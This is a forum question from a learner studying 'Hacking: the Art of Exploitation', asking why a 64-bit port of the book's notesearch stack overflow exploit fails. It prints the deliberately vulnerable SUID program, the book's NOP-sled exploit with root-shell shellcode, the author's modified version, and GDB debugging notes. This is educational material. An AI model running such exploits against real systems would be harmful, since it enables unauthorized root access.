Disclaimer: I believe a lot of the code I pasted is unnecessary (e.g. Functions in the notesearch program, and alterations in the exploit), but I included it for purposes of clarity. I don't want to scare anyone off with the long post, and I figured I ought to offer an explanation beforehand.
I am currently reading the book Hacking: the Art of Exploitation by Jon Erickson. The book comes with a virtual machine which is designed to ensure a constant environment for the examples to work, but I've decided to try and get through the book on my own environment to challenge my understanding of the material.
I am currently reading about stack based buffer overflows, exploiting unchecked buffers to rewrite the return address of a function, sling down a NOP sled, and executing shellcode. The program we are exploiting is as follows:
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include "hacking.h"
#define FILENAME "/var/notes"
int print_notes(int, int, char*); // Note printing function
int find_user_note(int, int); // Seek in file for a note for user.
int search_note(char*, char*); // Search for keyword function.
void fatal(char*); // Fatal error handler
int main(int argc, char *argv[]) {
int userid, printing=1, fd; // File descriptor
char searchstring[100];
if(argc > 1)
strcpy(searchstring, argv[1]);
else
searchstring[0] = 0;
userid = getuid();
fd = open(FILENAME, O_RDONLY);
if(fd == -1)
fatal("in main() while opening file for reading");
char searchstring[100];
while(printing)
printing = print_notes(fd, userid, searchstring);
printf("-------[ end of note data ]-------\n");
close(fd);
}
// A function to print the notes for a given uid that match
// an optional search string;
// rturns 0 at ed of file, 1 if there are still more notes.
int print_notes(int fd, int uid, char *searchstring) {
int note_length;
char byte = 0, note_buffer[100];
note_length = find_user_note(fd, uid);
if(note_length == -1)
return 0;
read(fd, note_buffer, note_length);
note_buffer[note_length] = 0;
if(search_note(note_buffer, searchstring))
printf(note_buffer);
return 1;
}
// A function to find the next note for a given userID
// returns -1 if the end of the file is erached;
// otherwise, it returns the length of the found note.
int find_user_note(int fd, int user_uid) {
int note_uid = -1;
unsigned char byte;
int length;
while(note_uid != user_uid) {
if(read(fd, ¬e_uid, 4) != 4) // Read the uid data.
return -1; // If 4 bytes aren't read, return end of file code.
if(read(fd, &byte, 1) != 1) // Read the newline separator.
return -1;
byte = length = 0;
while(byte != '\n') { // Figure out how many bytes to the end of line
if(read(fd, &byte, 1) != 1) // Read a single byte.
return -1;
length++;
}
}
lseek(fd, length * -1, SEEK_CUR); // Rewind file reading by length bytes.
printf("[DEBUG] found a %d byte note for user id %d\n", length, note_uid);
return length;
}
// A function to search a note for a given keyword;
// returns 1 if a match is found, 0 if there is no match.
int search_note(char *note, char *keyword) {
int i, keyword_length, match=0;
keyword_length = strlen(keyword);
if(keyword_length == 0)
return 1;
for(i = 0; i < strlen(note); i++) {
if(note[i] = keyword[match])
match++;
else {
if(note[i] == keyword[0]) // if that byte matches first keyword byte,
match = 1;
else
match = 0;
}
if(match == keyword_length)
return 1;
}
return 0;
}
The vulnerability occurs on the line:
char searchstring[100];
Where the attacker is able to write past the end of this buffer and overwrite the return address. This program is accompanied by a note taker program, and it is both assumed that /var/notes exists, and that this program is SUID root in order to allow access to this directory.
The book provides the code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
unsigned int i, *ptr, ret, offset=270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // zero out the new memory
strcpy(command, "./notesearch \'"); // start command buffer
buffer = command + strlen(command); // set buffer at the end
if(argc > 1) // set offset
offset = atoi(argv[1]);
ret = (unsigned int) &i - offset; // set return address
for(i=0; i < 160; i+=4) // fill buffer with return address
*((unsigned int *)(buffer+i)) = ret;
memset(buffer, 0x90, 60); // build NOP sled
memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
strcat(command, "\'");
system(command); // run exploit
free(command);
}
To take advantage of this overflow. Unfortunately this does not work on a 64 bit system because pointers are 8 bytes instead of 4, disallowing the casting of &i to an unsigned int so I changed this code to:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
uint64_t i, ret, offset=256;
char *command, *buffer;
command = (char *) malloc(400);
bzero(command, 400); // Zero out the new memory.
strcpy(command, "./notesearch \'"); // Start the command buffer.
buffer = command + strlen(command); // Set the buffer at the end.
if(argc > 1) // Set offset.
offset = atoi(argv[1]);
ret = (uint64_t) &i - offset; // Set return address.
for(i=0; i < 376; i+=8) // Fill buffer with return address.
*((uint64_t *) buffer + i) = ret;
memset(buffer, 0x90, 200); // Build NOP sled.
memcpy(buffer+200, shellcode, sizeof(shellcode)-1);
strcat(command, "\'");
system(command); // Run exploit.
free(command);
}
To account for this. (Note: the altered offset and initial value of i are products of my experimentation, and I know they are not correct.) I changed all the references to int to uint64_t types so that the casting of the pointer was possible without losing data. I also changed the increment value of i in the for loop to 8 so that the loaded return address would be properly spaced.
From here, I needed to determine a new value for the offset, so I ran the exploit in GDB. The address of i came out to be 0x7fffffffddf0. I stepped through the program until I was in the system call, and it seemed that the return address was pushed to the stack at address 0x7fffffffddc8, and was set to the value 0x00400660. This was pushed to the stack by register r12 at the beginning of the function, and appeared to be in the text segment of memory, so I went ahead and assumed it was the return address.
The stack pointer then was subtracted by 0x178, and I used the nexti instruction followed by x/100hw $rsp to see how the stack was changing. I needed to know how where the buffer was loaded into memory relative to the return address to determine how to align the loading of the return address, and how to determine the offset by which I guess the location of the NOP sled. I ended up getting to the end of the program without ever seeing much of a change in the memory between the return address and $rsp.
From here I figured that I could run the notesearch program in gdb to get a sense of the way the stack frame is constructed. I ran the program with the argument "AAAAAAAAAAAAAAAAAAAA" and stepped through the assembly line by line. It appeared that the buffer was loading 32 bytes above the value of $rsp, and with this information, I was able to figure out the length of the buffer. I knew that $rsp was 0x178 (376) bytes above of the return address, and I knew that the buffer began 32 bytes above $rsp. With this I figured that the exploit would need to write 344 bytes of code to overwrite the return address.
By subtracting the location of &i (0x7fffffffddf0) and the location of $rsp (0x7fffffffdc50), I was able to determine that the stack frame of the notesearch program began 416 bytes before the variable i, and that the buffer was placed 384 bytes before the variable i. I then built a 200 byte NOP sled, and put the shellcode right after this.
I then needed to determine the return address I would rewriting to hit the NOP sled and execute the shellcode. I figured that 128 bytes into a 200 byte NOP sled would be pretty central and provide decent padding for any errors. I calculated this to be at memory address 0x7fffffffdcf0, which would require an offset of 256 bytes from i to hit. I used this as the offset value, and then executed the program.
As you may have already gleaned, this approach did not work. I was greeted with:
[DEBUG] found a 7 byte note for user id 1000
-------[ end of note data ]-------
*** stack smashing detected ***: ./notesearch terminated
Aborted (core dumped)
I figured that this may have been due to misalignment of the return address when building the buffer, so I tried changing the initial value of i in the for loop to 4, then to 8, then to 12, but none of these approaches gave me a different result. I further tried changing the value of the offset to the theoretical extremities, but this did not work either.
My question is, what did I do wrong in my calculations? I suspect that the buffer was not written to the place where I think it was, because in the initial test of the program where I stepped into the system call rather than ran it independently, I did not see the buffer show up on the stack. It is also possible that I am missing something entirely about the way that a stack frame is constructed, or some other complexity in the compilation of the program.
So, what did I do wrong, and how can I alter my approach to something more generalized so that I can do right in the future?